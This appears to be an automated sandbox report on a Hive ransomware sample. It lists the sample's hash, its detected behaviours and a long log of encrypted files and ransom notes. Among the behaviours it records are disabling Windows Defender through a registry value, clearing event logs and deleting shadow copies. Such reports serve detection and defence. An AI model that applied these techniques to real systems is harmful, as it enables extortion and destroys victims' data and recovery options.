Malware Analysis Report

2024-10-16 03:13

Sample ID 220113-p9l6fsace2
Target cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52
SHA256 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52
Tags
hive evasion ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52

Threat Level: Known bad

The file cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52 was found to be: Known bad.

Malicious Activity Summary

hive evasion ransomware spyware stealer trojan

Modifies security service

Modifies Windows Defender Real-time Protection settings

Hive

Deletes Windows Defender Definitions

Clears Windows event logs

Deletes shadow copies

Modifies extensions of user files

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Modifies registry class

Interacts with shadow copies

Runs net.exe

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-13 13:01

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-13 13:01

Reported

2022-01-13 13:06

Platform

win7-en-20211208

Max time kernel

181s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\SysWOW64\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\css\clock.css C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_mNvCmA5ZLMU0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187883.WMF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_aTbNUIQxhh80.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0240189.WMF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_yVj3hWduYV00.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0285484.WMF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb__bBaHX0cMVw0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Internet Explorer\en-US\F12.dll.mui C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-uisupport.xml.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_Bpug1XGmR3E0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL097.XML.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_H0Dpy-OaGWk0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad\auxbase.xml C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Noronha.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_v5zX94j6C5I0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\drag.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0144773.JPG.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_ddFaBYf7CLg0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03731_.WMF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_lBeg1OU5lNk0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Maroon.css.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_r1mME8XvYp40.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN044.XML.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_x6wXvrX0zgg0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CERT.XML.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_z_I04DGk7pI0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\sXhL_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-common.jar.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_e2lhUbVdiJA0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_ja.jar.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_FhtD1ZjWZqY0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\vlc.mo.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_zPJrbu0fdoY0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107500.WMF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_XWgfB_YHTK00.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315580.JPG.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_xGgry6LVrA40.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14830_.GIF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_m0DueXHp7Os0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21548_.GIF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_b8254kpR1Mw0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\gadget.xml C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\ja-JP\js\timeZones.js C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00525_.WMF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_N388AWPpelM0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00557_.WMF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_bamtAESh67w0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107484.WMF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_hj_qJl65BXg0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TAIL.WMF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_3_-kf0ic6a00.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightYellow.css.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_Qyp-DWr38t00.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\css\settings.css C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.ja_5.5.0.165303.jar.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_MPW8Bawvh800.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0103058.WMF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_8MrpvyrJz7A0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386485.JPG.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_zyJmJNlTMUA0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Aspect.xml.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_xLrHbrEAnlM0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_ja_4.4.0.v20140623020002.jar.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_AhjUQ3r6_sk0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange\TAB_OFF.GIF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_nJG73JROZyc0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR31F.GIF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_8u08-Ayo1Jg0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\MLA.XSL.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_-jftVjVu1zA0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\ShapeCollector.exe.mui C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Chisinau.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_ip_asTVIsPU0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Campo_Grande.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_MWU6pXnZjOs0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ust-Nera.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_5wBjYJsuoy00.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Windows Mail\en-US\msoeres.dll.mui C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21309_.GIF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_oJafXVSSnyQ0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME09.CSS.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_PbLayShQWQI0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR50F.GIF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_xII8clN5oYs0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\flower.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\fontconfig.properties.src.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_XbO3rwG2rkg0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02431_.WMF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_r5yuOI0n4YM0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\DVD Maker\soniccolorconverter.ax C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_zh_CN.jar.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_oanMzuy2iiI0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185796.WMF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb__WKFw29mrTo0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WPULQT98.POC.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_gTE6Pv6dQz80.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CONTACT.CFG.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_tqaXwHTCTP80.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_left.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\IRIS\sXhL_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Macau.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_hsfvpypUZK00.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Niue.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_6hK9zNuXIN80.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\vlc.mo.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_6iu-7bmQ-8A0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Adjacency.thmx.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_EW97BkNXIc00.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0212661.WMF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_wN2bf6ZMgOY0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
